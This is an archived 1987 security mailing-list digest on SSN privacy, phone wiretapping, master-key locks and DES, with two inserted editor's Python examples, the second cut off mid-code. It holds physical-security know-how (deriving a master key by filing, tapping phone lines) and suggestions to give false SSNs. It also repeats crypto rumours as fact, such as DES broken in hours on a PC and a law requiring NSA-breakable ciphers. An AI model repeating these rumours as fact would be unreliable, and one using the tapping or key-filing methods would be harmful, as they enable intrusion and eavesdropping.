-*-*-*-*-*-*-*-*-*-*-*-*-*-*-

Date: Sat, 12 Sep 87 08:54:20 CDT
From: John Voigt - Systems Group
Subject: Re: SS and the data thieves...

> Again, why not submit a false one?

I have an unlisted phone number that I NEVER give out for use on credit slips. I usually give my old number which has been disconnected with no forwarding number. I don't know why they ask for it (except that the credit card people pressure them to) but I've already given them my driver's license and that has my SS#..... :-)

John/

-*-*-*-*-*-*-*-*-*-*-*-*-*-*-

Date: Sat, 12 Sep 87 20:26:17 EDT
From: Brint Cooper
Subject: Re: SS and the data thieves...

Many folks have written with perfectly plausible explanations about why merchants take my phone number on a credit card charge. What these fail to address, however, is that if I'm perpetrating a fraud in the use of this credit card, I'm not about to give out a correct phone number. They make no effort to validate the phone number before I leave, so what they're doing is collecting the phone numbers of a bunch of honest people.

Now then...Why are they collecting the phone numbers of a bunch of honest people?

_Brint

-*-*-*-*-*-*-*-*-*-*-*-*-*-*-

Date: Mon, 14 Sep 87 21:36:59 EDT
From: Neil Duffee <470820%UOTTAWA.BITNET@wiscvm.wisc.edu>
Subject: Re: SS and the data thieves...
In reply to Brint Cooper's notion of providing a false SSN number, this would not work here in Canada (nor probably the US either) since the SIN (our local equivalent to SSN) uses a check digit which can be verified readily by hand. Now, whether the clerk you are working with happens to know the appropriate formula or not......

As for the telephone numbers with credit cards, while working for Bank of Montreal Mastercard in Vancouver several years back, this extra information is also not required. It seems to be the merchants' personal way of gathering a little extra information should they be stuck with a bum (ie. fraudulent) purchase. As an example, they are actually required (not supposed, required) by their merchant's agreement with the Banking institution to check each and every purchase made with their copy of the 'hot' sheet. But, since they think it is a waste of time, a simple phone number usually will do. (Have you ever actually supplied the wrong number?)

In this particular instance, refusing the extra information is only the first step. Next, you could ask to see where it is stated in their merchant's agreement (good luck trying to find their copy - besides it's not written in your cardholder's agreement, is it?) Lastly, make a complaint to the Banking institution issuing the card as all merchant agreements are negotiated on an individual merchant basis. Besides, they have much more clout with this crummy individual and will, undoubtedly, want to keep someone with such an outstanding credit rating as yourself. Right? :->

Neil Duffee
Bitnet: NJD2F@UOTTAWA (Consultant biz)
        470820@UOTTAWA (student works)

-*-*-*-*-*-*-*-*-*-*-*-*-*-*-

Date: Mon, 14 Sep 87 22:10:46 EDT
From: bzs@bu-cs.bu.edu (Barry Shein)
Subject: SS and the data thieves...

> Again, why not submit a false one? Or your work phone? Or whatever?

Well, now c'mon. A couple of weeks ago I got a call from the photo store down the block that I had left without signing the credit slip.
They got the phone number as you said (I had written it on the slip.) Honest mistake, I went down and signed it. I suppose if I hadn't written the right phone # down they would have had the choice of either figuring out some other way to pursue me (perhaps MC would give them info or forward mail) or eating the 25 bucks.

To paraphrase Blanche DuBois: They have always relied on the kindness of strangers.

-Barry Shein, Boston University

-*-*-*-*-*-*-*-*-*-*-*-*-*-*-

Date: Tue, 15 Sep 87 09:11 PDT
From: "The Bandit . . . (on RITA)"
Subject: RE: Re: SS and the data thieves...

I once asked why you are asked for your phone number when using your charge cards. The clerk explained that thieves have been caught because they stupidly put down THEIR home phone number, not the phone number of the person who "owned" the card.

Derek Haining

From: mason@OBERON.LCS.MIT.EDU (Nark Mason) 23-Sep-1987 08:20:09
To: jh@ATHENA.MIT.EDU, security@red.rutgers.edu
Subj: [462] Re: ssn's

Again I will ask... I've seen lots of messages on this list about ways to keep your SS# secure, but still I haven't seen anyone give a reason *why* to keep it secure. Why bother? What horrible deed can be done with it that makes it worth not giving it out and the hassle that might follow?

curious in cambridge

From: ssr@tumtum.cs.umd.edu (Dave Kucharczyk) 23-Sep-1987 09:49:09
To: MISS026%ECNCDC.BITNET@wiscvm.wisc.edu, security@RED.RUTGERS.EDU
Subj: [850] re: Garage Door Openers

Just swapping crystals with a DPDT switch isn't as easy as it sounds. The wire from the crystal to the switch and from the switch to the holder may cause unstable operation or even no oscillation. Also that means you have to swap crystals in one of the garage door opener receivers. If the change in frequency is any appreciable amount the receiver will have to be retuned. An easier way to control two units with one remote is to get one that has a digital code (settable internally by a dip switch).
Simply get two openers and set them one bit apart in digital code. Then have the switch for that bit connected to an external switch on the remote controller.

ssr

From: jh@VENUS.MIT.EDU (Joe Harrington) 23-Sep-1987 13:46:27
To: security@red.rutgers.edu
Subj: [1518] ssn's

I have heard many explanations for keeping a hidden ssn. The most important one, in my opinion, is that it is much easier to sort records on a computer or in a paper filing system by a unique number, rather than by name (since names are not unique). If everyone uses the same number to refer to you then a huge amount of information can be gathered about you in a very short amount of time by someone with either authority or connections saying to dozens of employers, credit agencies, the IRS, the Registry of Motor Vehicles, the military, the police, the FBI, insurance agencies, hospitals, the schools you have been to, and practically any other organization with which you have had dealings and which keeps records "Tell me everything you know about 888-24-3315." I don't like information about me to be that accessible. Certainly it is almost as easy to say, "Tell me everything you know about John Wlodarczyk," which is one reason why many people don't hide their numbers. Other reasons include the moral position that people should not be reduced to numbers in a machine (though I guess those people have never heard of ASCII), and the legal position that the intent of a law should not be broken (the Social Security Act of 1933 may have loopholes, but as I understand it, the intent was clearly NOT to allow the number it assigned to anyone to be used for any other purpose).

--jh--

From: *Hobbit* 30-Sep-1987 17:21:14
To: security@RED.RUTGERS.EDU
Subj: [932] garage frobs

Mounting the crystals "elsewhere" in the box will probably cause the transmitter to go off half-cocked from stray capacitances, and possibly not open the door anymore.
If you pull something like this, make sure of the usual RF procedures, short leads, shielding, etc...

And why are garage door openers not a topic of security? It seems that those of you who own them are relying on them to keep vagrants out of your garage. Most remote door opener installations are done such that the manual locking mechanism of the door isn't used anymore [otherwise, it wouldn't open remotely]. A similar discussion was had about passive-RF cards a while back. There's always the fact that someone can conceivably listen to what your opener says when you drive up, and thus effectively have a key to your house...

_H*

From: gatech!codas!ki4pv!tanner@rutgers.edu 21-Sep-1987 11:25:39
To: security@red.rutgers.edu
Subj: [671] Re: Dogs, defense against

The mail carriers use something called "HALT!", the active ingredient of which is oil of cayenne pepper. Very effective; the lingering effect of the cayenne oil assures that the dog will remember the stuff. I get mine at the local bicycle shop. It goes for about $6; your prices may vary. I find that it takes an average of two applications before a dog will lose interest in chasing bicycles; some dogs do learn after the first application while others never learn.

Tanner Andrews, Systems CompuData, Inc. DeLand

From: simsong@broadway.columbia.edu (Simson L. Garfinkel) 24-Sep-1987 16:44:06
To: security@red.rutgers.edu
Subj: [501] ssn's

I've been giving out my MIT 888 number as my SSN for several years now. In fact, when I recently got my Columbia University ID number, I got them to use my MIT ID number rather than my SSN number. So the real question is this: How many databases list my MIT 888 number as my SSN number?

................................................................simson

From: dplatt@teknowledge-vaxc.arpa (Dave Platt) 25-Sep-1987 17:29:28
To: PERSHNG@ibm.com, security@RUTGERS.EDU
Subj: [1568] Anti-dog (and anti-mugger) sprays

As I recall, "Halt!"
and some similar products contain an active ingredient known as "capsicum oleoresin"; it's basically essence of hot pepper (capsicum resin) dissolved in oil (oleo). It's certainly effective at stopping dogs, and I imagine that it's probably just as effective in stopping humans unless their pain sense has been numbed (e.g. by PCP or a similar illegal drug).

I saw an article a couple of years ago that mentioned capsicum oleoresin sprays, and their use as a personal-defense weapon. The article mentioned one potentially serious problem: this ingredient has _not_ been legally authorized as "safe and effective" for use in defensive sprays that are to be used against humans. [From what I remember of the article, CS and similar tear gases have been tested and found not to cause long-term injury to the eyes and respiratory system; capsicum oleoresin has not been tested in this way]. This could, potentially, lead to the following unfortunate scenario: you're walking down the street, are approached by someone who makes threatening moves (but doesn't actually touch you), you zap him with Halt!, call the police, and the alleged assailant files charges against you, for assault with a caustic chemical. You end up in jail. I don't know of any case where this has actually happened, but the article I read indicated that it was potentially possible. User beware!

From: kludge@pyr.gatech.edu (Scott Dorsey) 25-Sep-1987 23:30:44
To: misc-security@gatech.edu
Subj: [997] Re: Telephone tapping via the isolation box

paul@UXC.CSO.UIUC.EDU (Paul Pomes - The Wonder Llama) writes:
>It occurred to me, while watching the telco man install my data line, that
>the network isolation box provides very easy access to a line tapper.
>A line powered FM transmitter with a RJ11 plug and socket at each end
>would take less than two minutes to install start to finish.

It takes a lot less time than that. Even more fun... take a look at your supply closets and broom closets at work (and maybe the bathrooms).
You'll probably find banks of #66 punchdown blocks with each line carefully labelled on them. Not only can someone walk in and make free phone calls, but dropping a tap in is simple. Keep the phone cabinets locked, and remember that the phone is never very secure in the first place.

-- Scott Dorsey Kaptain_Kludge Internet: kludge@pyr.gatech.edu

From: mlinar%poisson.usc.edu@oberon.usc.edu (Mitch Mlinar) 25-Sep-1987 23:33:09
To: misc-security@ucbvax.berkeley.edu
Subj: [1985] Re: Telephone tapping via the isolation box

>These thoughts have prompted me to install a locked cover over the box.

That is hardly worthwhile. What you have done MAY stop a true amateur, but wire tapping can be cleanly done anywhere along your phone line. There are some interesting gadgets I saw at a convention which clamp onto any phone line (outside or inside your house) WITHOUT need of a physical contact to the wire itself and filter out the background clutter to send a clean FM signal up to 1/4 mile away. (This was a closed convention in '84 for security types only; I happened to be consulting as a computer expert and needed to find products that were amenable to computer monitoring.) By the way, the price for this goody at the time was around $350 - cheap by most standards - and could be installed in 15 seconds. The receiver (a bit more pricey) could even filter out multiple signals (if it was clamped over two lines instead of one), but required some manual work to keep it focused if both lines were in use.

A more interesting gadget was an HP spectrum analyzer which was tied to a computer and display as well as a nice IF antenna. You got it. ANYTHING typed on the IBM-PC about 100ft away (for effect) appeared on the monitoring display. (Whoever said that emissions from PCs were small!) The antenna was directional, and for "kicks", the demonstrator turned it towards another known PC in the auditorium. We watched every character that the person at the Vivitar security booth typed in!
I don't mean to pick on you, Paul, but the state-of-the-art is well beyond your deterrent. Unless you reinstall your phone lines with two ground coax (all the way to the telephone pole) and get your PC TEMPEST equipped, the lock cover is about as effective as dead-bolting your doors while leaving the windows open...

-Mitch

From: sunybcs!kitty!larry@rutgers.edu 26-Sep-1987 10:52:43
To: security@RUTGERS.EDU
Subj: [532] Re: Telephone tapping via the isolation box

> These thoughts have prompted me to install a locked cover over the box.

And what, pray tell, do you plan to do about all of the unlocked, outside cable terminal boxes between your building and the telephone company central office?

<> Larry Lippman @ Recognition Research Corp., Clarence, New York
<> UUCP: {allegra|ames|boulder|decvax|rutgers|watmath}!sunybcs!kitty!larry

From: "Miles R. Fidelman" 30-Sep-1987 09:47:17
To: security@RUTGERS.EDU
Subj: [711] re: master keys

At least one way of setting up master keys is to use locks with pins that have multiple segments. In a normal lock, each pin is split into two pieces. The key pushes each pin up the amount necessary to line up the splits of all pins at the boundary between the stationary and rotating parts of the cylinder. In one of these special locks, each pin is made of multiple segments, i.e. there are two or more positions in which each pin will allow the lock to rotate. My guess is that there are relatively safe ways to set up the keying, and relatively unsafe ones.

Miles

From: dplatt@teknowledge-vaxc.arpa (Dave Platt) 30-Sep-1987 13:15:30
To: security@RUTGERS.EDU
Subj: [3885] Master keys

> It strikes me that most of the metal that my key is composed of is only there to stop me opening other doors rather than to allow me to open my own! Does this mean that the key to my door is very much more simple than it looks?

Probably not.
If your door's lock mechanism is built along the usual master-key lines, then it has as many pins as a non-master-keyed lock of similar manufacture. The pins, however, are designed somewhat differently.

Familiar with the construction of a standard pin lock? The top half looks a bit like this, in cross-section:

     -------------------------------------
     |            @  @  @  @  @          |   @ = small spring
     |            @  @  @  @  @          |   # = upper half of pin
     |            #  #  #  #  #          |   % = lower half of pin
     |____________#__#__#__#__#__________|   _ = cylinder wall
     |            #  #  #  #  #          |
     |            #  #  #  %  #          |
     |            #  %  #  %  %          |
     |------------%--%--%--%--%----------|
                  %  %  %  %  %          |
      keyway ->   %  %  %  %  %          |
                  %  %  %  %  %          |
     |-----------------------------------|

When you insert your key in the keyway, it pushes the bottom halves of the pins upwards, thus pushing the upper halves of the pins upwards and compressing the springs. If the notches on your key are each of the correct height, then the pins will all come to rest with the top-half/bottom-half line lying just at the cylinder wall. This will free the cylinder to rotate, and operate the bolt or latch. If any of the key notches is too high or too low, then the top-half/bottom-half line on its corresponding pin will lie either above or below the cylinder wall, and one of the two halves of the pin will prevent the cylinder from rotating.

A master-keyed lock works in very much the same way, except that the pins come in three parts, not two. The cylinder will be able to turn freely if each pin lies in either of two possible positions; either the top-section/middle-section line must lie at the cylinder wall, or the middle-section/bottom-section line must lie at the cylinder wall. From your description (your key has more metal than the master key), it sounds as if your key is designed to make the pins line up along the middle-section/bottom-section line, and the master key lines them up along the top-section/middle-section line.
This would indicate that the (bottom-section length + middle-section length) for each pin is the same for all of the locks on that particular master-key system, but that the actual lengths of the bottom and middle sections differ between the locks.

> Are these systems safe (It seems to me that taking a file to my key would allow it to open other doors!) enough?

Depends what you mean by "safe enough". They're certainly less secure, as there are obviously two different keys that can open the lock. Worse yet, there are probably even more than that: since each pin can be operated in either of two different positions, there are 2^(#-of-pins) different notch combinations that can operate the lock, out of M^(#-of-pins) possible notch combinations (where M is the number of different depths to which a notch can be cut). I imagine that these locks might also be a bit easier to pick than a non-master-keyed system. And, yes, if you were to take an impression of the master key, and simply file down your key until it matched, then you'd probably have a key that would open your door and many others as well.

If you have material that you really want kept secure, I'd suggest locking it up in a secure cabinet, using a difficult-to-pick padlock which is not master-keyed and to which you have the only key(s).

From: msmith@topaz.rutgers.edu (Mark Robert Smith) 30-Sep-1987 13:19:09
To: misc-security@RUTGERS.EDU
Subj: [1710] locks

My adolescent curiosity got the best of me in high school on a similar situation. One day, I showed up early for a play rehearsal, and found the door to the drama room locked. Someone else was there and in jest, I decided to try my keys to see if they'd work. Lo and behold, my home back-door key opened the door. I then tried the rest of the building and found to my amazement that the key opened about 3/4 of the doors to the building. As a matter of fact, I could get into just about any room but the science labs.
The technical explanation for this is that the school had 6-pin Falcon locks, and I had a 5-pin Kwikset standard house door lock. The inner 5 pins of my key were very close to the inner 5 pins of the master (I eventually saw it after a long explanation to the Vice-Principal) and the little notch to make the key go in smoothly was the same height as the 6th pin on the master. Thus, the lock "thought" that my key was the master. Eventually someone stole all of the keys to the building and hid them in the main office ceiling (they didn't find them for 18 months) and the whole building was re-keyed, to a much better system.

To answer the question posed by the original poster, I would say that the locksmith who keyed his building did a bad job. The master should have some pins higher than most, some lower. It sounds like your master has all pins lower than the individual keys. Therefore, yes, you should be able to file your key down to the master and use it for everything.

Smitty
-- Mark Smith (alias Smitty) msmith@topaz.rutgers.edu

From: *Hobbit* 2-Oct-1987 17:57:31
To: security@RED.RUTGERS.EDU
Subj: [2449] master keys

Ah, finally someone *else* talks about locks...

Master key systems can be done correctly or done stupidly. Normally [i.e. correctly] the cut heights for the master are mixed as to whether they're above or below the cut heights for the non-master key[s], and placed a sufficient distance away so that there's no possibility of placing pins at the master position by wiggling the slave key or inserting it to funny places. Often mastered systems use very thin splits [the little wafer inserts between the pin and the driver that allow the lock to open at different cut heights] which can jam or fall out of the cylinder. If the maid's key cuts were all lower than the cuts on your office key, then the system was done stupidly, and you could generate a master by cutting your key down to the master level.
[You can determine the master level by taking your office lock apart and loading in just the master pins/splits as a template.] I suspect that there are quite a few systems out there that are done this way. Suspect this if all the slave keys look like they don't have too many low cuts in them.

Sometimes odd-shaped drivers called mushroom drivers are used in heavily mastered systems, in an attempt to make them harder to pick. These will allow the plug to cock over a little bit during picking but with the given pin in the wrong position, so that additional fiddling has to be done to get it to the right position. Some older Russwins use ball bearings in place of rounded pin ends to reduce wear in heavily-used locks. [If you take your lock apart, of course, keep very close track of where everything went, or it obviously won't work anymore...]

To disable the master position and only allow your office key to work the lock, you'd normally have to obtain different pins of the right heights. You might get lucky, however, and find two pins whose mastering parts could be swapped, changing the master height there but leaving the slave height. Then the maids couldn't get in but you could.

I suspect that there are quite a few of us that majored in locksmithing in high school, and were dearly loved by the deans. If only I had had the presence of mind back then to explain to them how locks are perceived as little puzzles to take apart and solve, not as something standing in the way of theft.

_H*

From: "GLENN EVERHART, 609 486 6328" 26-Sep-1987 07:28:57
To: Security@RED.RUTGERS.EDU
Subj: [3469] Secure phones

The NSA is involved in distributing these phones as part of a more general effort to get at least some US companies to have reliable security. The story I've heard (though I don't have it from classified sources) is something like this:

1. DES was originally certified, but was designed with a short enough key that NSA could break it by brute force.
(It IS a federal law that no cipher may be used for international traffic that NSA can't break, so the permeability of DES follows from reading the relevant US Code sections.) The classified algorithms are said to differ from DES mainly in the length of their keys.

2. Recently, someone furnished NSA with an efficient DES breaking algorithm. This was said to take 1.5 hrs. on an IBM PC to break a DES cipher. I understand that hard details of this have been classified and NSA does NOT particularly want to confirm this. Still, some NSA employees have confirmed that DES is not nearly as secure as was originally thought. Thus, NSA isn't going to certify DES again, at least not willingly, because they KNOW it's breakable. (It's been suggested that a different key scheduling data area could give a more secure algorithm, but the generator for the key schedulers is not available, at least not readily.) An Australian friend of mine mentioned he saw an article on breaking DES back in '79 or '80 in the Proceedings of the Soviet Academy of Sciences, but has since told me the article deals only with certain classes of keys. (BTW, it also mentions that if you insist on choosing large PRIMES for public key cryptosystems keys, the public key systems become fairly easy to crack also; what's needed are RELATIVELY PRIME numbers, not primes.)

3. Since DES has proven embarrassingly easy to crack, and since large amounts of money are "protected" by it, NSA is proposing to let industry use the "real stuff", the algorithms they use themselves, which hopefully are less permeable. To do so, they furnish algorithms and keys (preserving the ability they have by law to decipher the text), but are paying fairly large sums to develop these phones and other boxes. A good deal of custom microelectronics is involved. And this is why you see NSA discussing crypto phones etc.
(You are of course aware, I trust, that ANY phone conversation that gets onto microwave is potentially as open to interception as home radiophones are... and many of these links to industry ARE monitored...)

I've heard another story someone might comment on: Some US company (I forget which; it's not important) sent a binary copy of an operating system over wire to England. However they used the unix crypt tool on it first, more than once and with different keys. The story is they got a call a few days later from NSA demanding they give NSA the keys used to encipher it. The algorithm is just character XORs with a string. But if you do it several times with strings of lengths that are relatively prime, couldn't the effective string become the product of the key lengths, and quickly grow comparable in size with the original message? Does anyone out there know enough cryptography to tell me whether this is really a super cheap and strong cipher, or whether it's just a minor nuisance for folks who go in for this sort of thing?

Glenn Everhart%Arisia.decnet@ge-crd.arpa

From: TS5864%OHSTVMB.BITNET@wiscvm.wisc.edu 28-Sep-1987 14:56:49
To: SECURITY@RED.RUTGERS.EDU
Subj: [1189] Social Security Numbers Continued

I have been reading the news about Social Security numbers (and the giving out thereof) with interest. I guess the newsgroup is successful, as I now ask for a reason when someone asks for my SS Num. I saw something in a campus paper today in which an advertiser wants a SS number, but also provides an out. The ad is for purchasing computer software at an educational discount:

[in the directions] "Make a photocopy of your current Student ID or Faculty card and... some well known form of id. displaying your Social Security number,... (WPCORP will hold this information strictly confidential and use it only to guard against duplicate purchases.)

[Then later on...]
If you have serious reservations about providing a social security number, call Educational Development... to establish clearance to purchase any of the above software products..."

In a world where it is difficult and inconvenient at best not to automatically provide the SS number when asked, I thought this was a nice change.

Thomas Lapp

From: djw@LANL.GOV (David Wade) 25-Sep-1987 12:03:28
To: Security@RED.RUTGERS.EDU
Subj: [668] Re: Digest of SSN responses

> To my knowledge, the Privacy Act applies only to the Federal
> Government and to contractors operating on its behalf. Is this not
> true? I don't believe it is illegal for a university to use a student's
> SSN as his/her student id.

The Privacy Act is written specifically for Federal Agencies, Subcontractors, and Universities. There is no University which does not accept federal money. Call your congressman's office and get a "free" copy of the Privacy Act of 1974 quickly; before Bork invalidates what's left. 8*)

Dave

From: Mike Linnig 26-Sep-1987 23:23:15
To: security@RED.RUTGERS.EDU
Subj: [660] RE: Telephone tapping via the isolation box

There are multiple places that your line COULD be tapped. If I were going to do it for a short amount of time I'd go up the road from your house and tie in at one of those telephone junction boxes. The telephone person would spot it in a second, but it would be good for a week or so on the average. The real problem with that technique is that you would have to figure out which line is yours. But if you were a mafia Don, at least I don't have to walk up to your house (grin).

Mike Linnig

From: mason@oberon.lcs.mit.edu (Nark Mason) 29-Sep-1987 09:43:46
To: paul@uxc.cso.uiuc.edu, security@RUTGERS.EDU
Subj: [885] Re: Telephone tapping via the isolation box

Don't worry, your phone lines still are not safe. Many years ago (when I was young and irresponsible...)
I amused myself a few times by sitting in the bushes near my house at an unlocked telco junction box looking for a friend's data line. Didn't find it, but I did hear some interesting stuff and caught a guy trying to break into a nearby church (I wouldn't tell the police where I was phoning from). Failing this I went to his house, clipped my handset into the wires outside his house and plugged a tape recorder in. In a relatively large city like Newton the CO's (Company Offices?) were manned 24 hours a day; in smaller cities they aren't and no one's too concerned with keeping people out of them.

From: *Hobbit* 28-Sep-1987 23:15:29
To: security
Subj: [2275] Caving Horror Stories (III)

[This came over another mailing list -- I couldn't resist. Is *your* town's sewer system a threat to national security? _H*]

From: commgrp@silver.bacs.indiana.edu
Subject: Caving Horror Stories (III)

A caver from Austria who recently visited the U.S. told some grim tales about caving in Eastern Europe, especially E. Germany. He's translating _CAVER OF FORTUNE_ into German, with added advice on how to keep a low profile while caving in E. Europe.

East Germany has a law against going underground. Literally interpreted, it says that you must stay out of your own basement. Apparently, the law was enacted after a few people tunnelled their way out of E. Berlin. The government does support sports, however, so caving clubs are allowed. The party tries to plant spies in the cave clubs but everybody knows who they are, so they take them on extremely rough cave trips and thoroughly trash them! Club newsletters are required to contain party-line material about how caving advances the cause of the state; this is usually accomplished by duplicating the same page in each newsletter issue.

European cavers explore old mines and tunnels, as well as natural caves.
Networks of artificial tunnels are common under old European cities; they are ancient sewers, were used to hide from invaders, etc., and their locations are unknown to present city governments. The cavers in an E. German city (which must remain nameless) discovered an iron door on the river bank, overgrown with weeds. They picked the lock, made their own key, and explored the tunnels. They found treasure which was hidden there during World War II by the local inhabitants, most of whom were killed when the city was bombed. Being caught in the tunnels means a one-way ticket to Siberia, so it's the ultimate stealth-caving!

Cave locations are state secrets in eastern-bloc countries; some French cavers were caught at the border of Yugoslavia with a roadmap on which they had marked cave locations; they were jailed as spies, and it was three weeks before the French embassy bailed them out.

From: weiser.pa@Xerox.COM 30-Sep-1987 12:49:06
To: security@red.rutgers.edu
Subj: [454] Re: Simson Garfinkel's article, part 2 of 3

"Examples of secure passwords include ***random, unpronounceable combinations of letters and numbers*** and several words strung together."

I do not consider "random, unpronounceable combinations of letters and numbers" to be a secure password. Such a password is extremely likely to be written down.

-mark

From: jm7@pyr.gatech.edu (John McLeod) 30-Sep-1987 16:02:01
To: AWalker@red.rutgers.edu
Subj: [552] Re: Simson Garfinkel's article, part 3 of 3

Over a year ago, the programmers at Sandia National Laboratories used a computer to factor a number that is larger than the standard RSA keys that are in standard use for the banking system. Admittedly, they used a few weeks of CRAY time, but the number was factored. How secure a Public Key Crypto system is depends in part on how valuable the information that is being transmitted is.
jm7

From: Mike Linnig 30-Sep-1987 19:57:42
To: securty@RED.RUTGERS.EDU
Subj: [825] re: making a master key

I'm not an expert but I had a cubemate that studied locks and locksmithing. I think if you could get a couple of other folks' keys on your floor, you could determine which parts of the key were common and file the remainder away. I think the general trick is that the tumblers in the lock have a couple of cuts, not just one. The master key pushes (one or more) tumblers to this second position. Seems on reflection that there are ways of making master keys that cannot be deduced from looking at non-mastered keys, but I'm not sure every lock maker employs these techniques. (Sorry if that rambled a bit, but I'm trying to recall five-year-old conversations.)

Mike Linnig

From: mason@OBERON.LCS.MIT.EDU (Nark Mason) 30-Sep-1987 22:29:29
To: jh@VENUS.MIT.EDU, security@red.rutgers.edu
Subj: [1150] Re: ssn's

I guess if you have something to hide from people that are looking for info about you, you can just give them a bogus number instead. If someone asks you your number and you say "I refuse to tell you" it will make them wonder. If you say "934-28-3546" they will write it down, no questions asked, no sweat.

Your being worried about being reduced to a number in a computer sounds kind of silly to me. How does VENUS.MIT.EDU refer to you? By your UID. You say you have a username? Surprise! You're 106 104 @ 18.83.0.117. Do you find this morally offensive? If you make people use your name instead of a number it's just packed decimal instead of binary. If you don't want to be a number you'll have to refuse to let them enter you into a computer. The whole point of people using your SS# is each person already has a unique one so they don't have to give you one. It just makes life easier. Your point up there ^^ that refusing to relinquish your number makes things more difficult is valid though.
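[Editor's added example; this is not part of any message in the thread. It models the master-keyed pin stacks that Dave Platt, Mark Smith, Hobbit and Mike Linnig describe above: a three-part pin (bottom pin, master wafer, driver) gives each chamber two shear positions, so a lock with k mastered chambers is opened by 2^k cut combinations out of M^k, and a change key whose cuts are all shallower than the master's can be filed down into a master. Depth units, the seven-depth keyspace, the pin values and the two sample keyings are invented for illustration; "lift" is the height to which a cut raises the bottom pin, so a deeper cut means a smaller lift.]

```python
from itertools import product

# Each chamber of the cylinder holds a stack: bottom pin, optional master
# wafer, driver pin.  A stack is modelled as (bottom, wafer) in the same
# abstract depth units as the key cuts; wafer == 0 means the chamber is not
# mastered.  The plug turns only if every chamber has a split at the shear
# line, i.e. the key's lift equals `bottom` or `bottom + wafer`.

def operating_lifts(stack):
    """Lifts that put one of the stack's splits at the shear line."""
    bottom, wafer = stack
    return {bottom, bottom + wafer}        # one value if wafer == 0, two otherwise

def opens(lock, key):
    """True if `key` (tuple of lifts, one per chamber) turns `lock`."""
    return len(key) == len(lock) and all(
        lift in operating_lifts(stack) for stack, lift in zip(lock, key))

def operating_keys(lock, depths):
    """Every cut combination over `depths` that opens the lock.
    With k mastered chambers that is 2**k keys out of len(depths)**k."""
    return [key for key in product(depths, repeat=len(lock)) if opens(lock, key)]

def pin_lock(master, change):
    """Pin a cylinder so that both `master` and the individual `change` key
    operate it: the lower lift becomes the bottom pin, the difference the
    master wafer (the three-part pin in Dave Platt's description)."""
    return [(min(m, c), abs(m - c)) for m, c in zip(master, change)]

def can_file_into(have, want):
    """Filing only removes metal, so every cut can only get deeper and every
    lift can only go down.  A change key can therefore be filed into the
    master exactly when none of the master's lifts exceeds its own."""
    return all(w <= h for h, w in zip(have, want))

def well_separated(master, change, min_step=2):
    """Hobbit's rule: where a chamber is mastered, the master and change cuts
    should differ by at least `min_step` depths so a wiggled change key
    cannot reach the master split.  Equal cuts leave the chamber unmastered."""
    return all(m == c or abs(m - c) >= min_step for m, c in zip(master, change))

DEPTHS = range(1, 8)   # seven cut depths; an assumption made for this demo

# "Done stupidly" (Smith, Dobnick): every master cut deeper than the change key's.
BAD_MASTER, BAD_CHANGE = (2, 2, 2, 2, 2), (5, 4, 6, 3, 5)
# "Done correctly" (Hobbit): master cuts mixed above and below the change cuts.
GOOD_MASTER, GOOD_CHANGE = (2, 6, 3, 6, 2), (5, 3, 6, 3, 5)

def analyse(master, change, depths=DEPTHS):
    """Summarise one master/change pairing: how many keys open the pinned
    lock, and whether the change key can be turned into the master with a file."""
    lock = pin_lock(master, change)
    return {
        "both_keys_open": opens(lock, master) and opens(lock, change),
        "keys_that_open": len(operating_keys(lock, depths)),
        "possible_keys": len(depths) ** len(lock),
        "change_files_to_master": can_file_into(change, master),
        "well_separated": well_separated(master, change),
    }

if __name__ == "__main__":
    for label, m, c in (("bad", BAD_MASTER, BAD_CHANGE), ("good", GOOD_MASTER, GOOD_CHANGE)):
        print(label, analyse(m, c))
```

Both sample systems are opened by 32 of the 16807 possible five-pin keys, which is Dave Platt's 2^(#-of-pins) against M^(#-of-pins); the difference is that only the "bad" keying lets a tenant file an office key down into the master, and it also violates the minimum-separation rule in one chamber. Swapping the master and change pins in a chamber, as Hobbit suggests for locking the maids out, is just `pin_lock` with that chamber's two lifts exchanged.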
From: jh@VENUS.MIT.EDU (Joe Harrington) 1-Oct-1987 16:43:50
To: mason@OBERON.LCS.MIT.EDU, security@red.rutgers.edu
Subj: [1104] ssn's

As for giving out bogus numbers and claiming they are my own, I cite a recent article on this list concerning what that does to the SSA and the (legitimate) records they have, and how easy it is for me to correct them. Also, I'm not sure of the legality of falsification on signed documents (like checks and bills of sale) and I'm not into lying to people.

Should someone wish to start collecting info about me, that person is certainly not going to walk up to me, identify himself, and say "By the way, what is your social security number?", so I cannot, as you suggest, "just give them a bogus number instead." He will read it off some form my name is on. To hide my number (to avoid giving him a universal cross-reference), I would have had to withhold it from people since I got it. Since I didn't hide it from the beginning, I see little point in hiding it now, as anyone really determined can get it from places I have already given it to.

--jh--

From: bruno%csd4.milw.wisc.edu@csd1.milw.wisc.edu (Bruno Wolff III) 30-Sep-1987 18:57:24
To: misc-security@seismo.css.gov
Subj: [909] Re: Simson Garfinkel's article, part 3 of 3

You must be very careful verifying programs to see if they have changed. Often a program can be patched so as to remain the same size by using partially full pages or replacing seldom used routines. On many systems the modification date can also be changed back to the original date (this is nice when copying files). If you keep another copy of the program to run a diff against, it should be hidden so that both the program and the copy aren't changed. Best would be to bring a copy in off some removable media to do the comparison. The medium should only be mounted when the person to do the comparison is there in person. Even then the program for reading the file in or the diff program could have been tampered with.
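[Editor's added example; this is not Bruno Wolff's code or part of any message in the thread. It demonstrates the two failure modes he describes: a patch that keeps the file length unchanged and then puts the original modification time back passes a size-and-date comparison, while a cryptographic digest recorded in a baseline manifest still catches it. The "binary" is a constructed byte string, not a real executable, and the manifest is kept in memory here; in use it belongs on removable media mounted only for the comparison, as the message recommends.]

```python
import hashlib
import json
import os
import shutil
import tempfile

def fingerprint(path):
    """Size, modification time and SHA-256 of a file.  Size and mtime are
    the attributes Bruno says an attacker can preserve; the digest is not."""
    st = os.stat(path)
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return {"size": st.st_size, "mtime_ns": st.st_mtime_ns, "sha256": h.hexdigest()}

def make_baseline(paths):
    """Baseline manifest to be carried off-host (e.g. on removable media)."""
    return {p: fingerprint(p) for p in paths}

def naive_check(baseline, path):
    """The comparison many sites rely on: unchanged size and modification date."""
    cur, ref = fingerprint(path), baseline[path]
    return cur["size"] == ref["size"] and cur["mtime_ns"] == ref["mtime_ns"]

def hash_check(baseline, path):
    """Content comparison: the digest must match the recorded one."""
    return fingerprint(path)["sha256"] == baseline[path]["sha256"]

def same_size_patch(path, offset, new_bytes):
    """Attacker's move as described in the message: overwrite bytes in place
    so the length stays the same, then restore the original timestamps."""
    st = os.stat(path)
    with open(path, "r+b") as f:
        f.seek(offset)
        f.write(new_bytes)
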